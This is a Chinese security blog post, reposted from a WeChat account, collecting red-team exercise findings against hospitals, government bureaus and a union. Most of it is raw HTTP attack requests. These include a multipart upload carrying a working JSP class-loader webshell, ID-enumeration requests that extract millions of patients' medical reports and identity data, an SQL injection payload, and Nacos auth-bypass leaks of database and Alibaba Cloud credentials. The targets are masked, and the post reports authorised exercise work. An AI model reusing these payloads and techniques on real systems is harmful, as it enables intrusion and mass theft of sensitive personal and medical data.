正文部分

上上个月参加了某个地级市的攻防演练，将小部分报告合并分享出来（想要抽奖的师傅直接拉到文末就行啦~~）(打码打到我想死~)

某公司未授权+文件上传getshell

http://xxx.xxx.xxx:9081

‍

文件上传getshell

POST /api/portal/v1/file/upload?lang=zh_CN HTTP/1.1
Host: xxx.xxx.xxx:9081
Content-Length: 1230
Accept: application/json, text/plain, */*
Tenant-Code: WS
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36 Edg/125.0.0.0
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryytBWAvbx7URctPS3
Origin: 
Referer: 
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
Cookie: _cmslang=zh_CN; sajssdk_2015_cross_new_user=1; sensorsdata2015jssdkcross=%7B%22distinct_id%22%3A%2218fccb0d291acc-0d8cd14b802cf3-4c657b58-1395396-18fccb0d2921854%22%2C%22first_id%22%3A%22%22%2C%22props%22%3A%7B%22%24latest_traffic_source_type%22%3A%22url%E7%9A%84domain%E8%A7%A3%E6%9E%90%E5%A4%B1%E8%B4%A5%22%2C%22%24latest_search_keyword%22%3A%22url%E7%9A%84domain%E8%A7%A3%E6%9E%90%E5%A4%B1%E8%B4%A5%22%2C%22%24latest_referrer%22%3A%22url%E7%9A%84domain%E8%A7%A3%E6%9E%90%E5%A4%B1%E8%B4%A5%22%7D%2C%22identities%22%3A%22eyIkaWRlbnRpdHlfY29va2llX2lkIjoiMThmY2NiMGQyOTFhY2MtMGQ4Y2QxNGI4MDJjZjMtNGM2NTdiNTgtMTM5NTM5Ni0xOGZjY2IwZDI5MjE4NTQifQ%3D%3D%22%2C%22history_login_id%22%3A%7B%22name%22%3A%22%22%2C%22value%22%3A%22%22%7D%2C%22%24device_id%22%3A%2218fccb0d291acc-0d8cd14b802cf3-4c657b58-1395396-18fccb0d2921854%22%7D
Connection: close

------WebKitFormBoundaryytBWAvbx7URctPS3
Content-Disposition: form-data; name="file"; filename="11.jsp"
Content-Type: image/png

<%!
class U extends ClassLoader {
U(ClassLoader c) {
super(c);
}
public Class g(byte[] b) {
return super.defineClass(b, 0, b.length);
}
}

public byte[] base64Decode(String str) throws Exception {
try {
Class clazz = Class.forName("sun.misc.BASE64Decoder");
return (byte[]) clazz.getMethod("decodeBuffer", String.class).invoke(clazz.newInstance(), str);
} catch (Exception e) {
Class clazz = Class.forName("java.util.Base64");
Object decoder = clazz.getMethod("getDecoder").invoke(null);
return (byte[]) decoder.getClass().getMethod("decode", String.class).invoke(decoder, str);
}
}
%>
<%
String cls = request.getParameter("passwd");
if (cls != null) {
new U(this.getClass().getClassLoader()).g(base64Decode(cls)).newInstance().equals(pageContext);
}
%>
------WebKitFormBoundaryytBWAvbx7URctPS3
Content-Disposition: form-data; name="type"

NEWS
------WebKitFormBoundaryytBWAvbx7URctPS3--

https://xxx.xxx.xxx/static_resources/draft/news/xxxx/xxxxx.jsp

密码：passwd

某医院百万用户泄露

体检报告查看

POST /app-api/examination/getInspectionList HTTP/1.1
Host: xxx.xxx.xxx:18145
Content-Length: 70
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Safari/537.36 NetType/WIFI MicroMessenger/7.0.20.1781(0x6700143B) WindowsWechat(0x63090a13) XWEB/9129 Flue
Authorization: Bearer b78b2e2f-b162-4528-ba26-38ff5da78f87
Apptoken: 5891187f4fe91f58bb0fdcf8216254a6d71d43bbe198e86f92a70648f2bc55c9e8cc344fa9b4fa0126c2b78d9891aa71d276a1b8ec0c48b0f20c452f5d129da2f31a907799852ae1cca039a8277d19d4339f19e02116487d737686472fe212bc810e9e61fcde11436e0494459e46bd59cc84fe78097e94f631a694bbb0340a4a0f14f2fefbf4e4b1f8065b28647cec0ff0178d1b4ea44f444bda289f84d1b53cb5a8dc0ed7531dd5c327e4dea7ecaa853eed0acc41652d2205228d6c12a108bb
Content-Type: application/json
Accept: */*
Origin: 
Sec-Fetch-Site: same-site
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: 
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Connection: keep-alive

{"queryType":8,"queryValue":"6363","month":"2024-05","needPage":false}

遍历queryValue即可从0到3000000都不间断有报告 这是2225636

这是808

用户订单信息查看

POST /app-manage/inHospital/getInpatientPayList HTTP/1.1
Host: xxx.xxx.xxx:18145
Accept-Encoding: gzip, deflate, br
Accept: */*
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.6099.71 Safari/537.36
Connection: close
Cache-Control: max-age=0
Content-Type: application/json
VERSION: test
Content-Length: 46

{"pageSize": 100,"needPage": true,"pageNo": 1}

只需要把pagesize修改为10000即可

某医院百万五要素泄露

通过小程序获取到站点

遍历uid可以获取到五要素 身份证，姓名，电话，地址，出生日期

POST /xxxx/xxxx/xxxlativeList HTTP/1.1
Host: xxx.xxx.xxx
Content-Length:24
Xweb_xhr:1
Orgcode:18477
User-Agent:Mozilla/5.0(Windows NT 10.0;Win64; x64)AppleWebKit/537.36(KHTML, like Gecko)Chrome/116.0.0.0Safari/537.36MicroMessenger/7.0.20.1781(0x6700143B)NetType/WIFI MiniProgramEnv/WindowsWindowsWechat/WMPF WindowsWechat(0x6309071d) XWEB/9129
Content-Type: application/x-www-form-urlencoded
Accept:*/*
Sec-Fetch-Site: cross-site
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: 
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

hCode=18477&uid=39701982

遍历uid即可获取百万敏感信息， 大约500个跑出来250条数据，目前应该总共有400w的uid，大约有200w的五要素

部分uid会泄露全家，父母，自己，配偶的五要素等敏感信息

通过这里获取的信息，还可以获取到用户的： 住院信息，拍片信息，付款信息，发票信息，挂号信息，手术信息

某局数据库权限+getshell

nacos 泄露postgre数据库连接密码

获取数据库权限

尝试连接之后直接进行命令执行

rabbitmq

某局所有用户接管+SQL注入获取oracle26个数据库40个数据库用户以及DBA权限

也是通过小程序获取站点

获取所有公司管理者用户名和明文密码，以及管理者的手机号身份证等信息 随便点击一个企业

自动发送数据包

泄露信息如下

泄露该公司管理员的账号密码，尝试登陆可以登录成功 登录网址：https:/xxx.xxx.xxx/

最终泄露的信息如下 1161个公司的账号和密码 登陆公司账号之后可以获得相关人的身份证、手机号、邮箱

获得账号密码之后可以进行登陆

点击进入系统

可以获取大量视频监控权限查看到实时监控，以及各大地方监控的token

所有账号弱口令，通过后台获取到电话号，密码为a123456

SQL注入

数据包

POST /cxmStatic/dashboard/1/list HTTP/1.1
Host: xxx.xxx.xxx
Cookie: 
Content-Length: 14
Accept-Encoding: gzip, deflate, br
Apptype: WEIXIN_MINI
Authorization: eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiIxNDUwNjc6V0VJWElOX01JTkkiLCJleHAiOjE3MTU5NjQwNTEsImlhdCI6MTcxNTk0OTY1MX0.qUHwdpcRccIg4Nct5i58qPxZ6OiV9PfBhHilWhyIG_0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Safari/537.36 MicroMessenger/7.0.20.1781(0x6700143B) NetType/WIFI MiniProgramEnv/Windows WindowsWechat/WMPF WindowsWechat(0x63090a13) XWEB/9129
Content-Type: application/x-www-form-urlencoded
Charset: UTF-8
Xweb_xhr: 1
X-Requested-With: XMLHttpRequest
Appid: wx67d2416db3cb5b69
Accept: */*
Sec-Fetch-Site: cross-site
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: 
Accept-Language: zh-CN,zh;q=0.9
Connection: close

zoneId=511827*

数据库如下总计26个

数据库的用户名如下总计40个数据库用户

其中一个数据库256个表

数据库中有三要素信息

某医院水平越权查看20w+患者体检报告

数据包如下，token随便用一个自己生成的token即可 生成token 发送如下数据包即可获取token

POST /sj-bifrost-web/report/generateToken HTTP/2
Host: xxx.xxx.xxx
Content-Length: 37
Accept: application/json, text/plain, */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Safari/537.36 NetType/WIFI MicroMessenger/7.0.20.1781(0x6700143B) WindowsWechat(0x63090a13) XWEB/9129 Flue
Content-Type: application/json
Origin: 
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: 
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9

{"examineeIcno":"123"}

POST /sj-bifrost-web/report/detail HTTP/2
Host: xxx.xxx.xxx
Content-Length: 101
Accept: application/json, text/plain, */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Safari/537.36 NetType/WIFI MicroMessenger/7.0.20.1781(0x6700143B) WindowsWechat(0x63090a13) XWEB/9129 Flue
Content-Type: application/json
Origin: 
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: 
Accept-Language: zh-CN,zh;q=0.9

{"token":"F83BA1402B2A8AABB3D042115500D571D3A1685910B84F00B907689BA4ED0547","serviceNumber":"199245"}

遍历serviceNumber即可查看其他的报告，但是身份证还是跟token相关，报告仅仅与serviceNumber相关，遍历serviceNumber从0到30w

这里id从0遍历到了20w都有数据

某学院附属医院未授权SQL注入获取58387条公民信息

通过数据包获取token

POST /sj-bifrost-web/report/generateToken HTTP/2
Host: xxx.xxx.xxx
Content-Length: 31
Accept: application/json, text/plain, */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Safari/537.36 NetType/WIFI MicroMessenger/7.0.20.1781(0x6700143B) WindowsWechat(0x63090a13) XWEB/9129 Flue
Content-Type: application/json
Origin: 
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: 
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9

{"examineePhone":"' or '1'='1"}

利用token获取三要素信息

GET /sj-bifrost-web/report/reportOrderList?token=8ED9D6B38CDBF617724060160F957101311CFF26B28F48D18CFFDCA22C3D7A62 HTTP/2
Host: xxx.xxx.xxx
Accept: application/json, text/plain, */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Safari/537.36 NetType/WIFI MicroMessenger/7.0.20.1781(0x6700143B) WindowsWechat(0x63090a13) XWEB/9129 Flue
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer:
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9

某工会云接管getshell

nacos中泄露了ak导致云接管

aliyun:
  textAudit:
    accessKeyId: xxxxxxxxx
    secret: xxxxxxxxxxxxx
    endpoint: xxxxxxxxxxxxxx

获取阿里云账号密码

成功登陆 获取一台阿里云服务器权限

可以直接在阿里云进行终端控制rce，getshell

同时该账户旗下有大量的资源 如下图： 多个域名控制权 服务器控制权 多个储存控制权 网关控制权 短信服务控制权 视频直播控制权 DNS服务器控制权 51个资源

某工会nacos存在身份验证绕过漏洞+ 数据库权限

http://xxx.xxx.xxx:28848/nacos/

获取到nacos中的配置

### redis服务
redisInfo:
    host:xxxxxxxxxx
    port:xxxxxxxx
    password: xxxxxxxxxxx
    database:0
### mysql服务
custom:
  mysql:
    master:
      connect:xxxxxxxx
      username: xxxxxx
      password:xxxxxxxx
    slave:
      connect:xxxxxxxxx/xxxxxx
      username: xxxxxxxxxx
        password:xxxxxxx
dxb:
  httpUrl: xxxxxxxxxx
  dxbUsername: xxxx
  dxbPassword: xxxxx

rabbitmq:
    host: xxxxxxx
    port: xxxxxx
    username: xxxxxxx
    password: xxxxxxxxxxxx

泄露微信apikey和密钥

获取ak：https://api.weixin.qq.com/cgi-bin/token?grant_type=client_credential&appid=xxxxx&secret=xxxxxxxxxxxxxxx

https://api.weixin.qq.com/cgi-bin/get_api_domain_ip?access_token=ak 可以利用该ak管理公众号

原文始发于微信公众号（渗透安全团队）：地市护网爽拿上万分，一次看个爽(文末抽奖)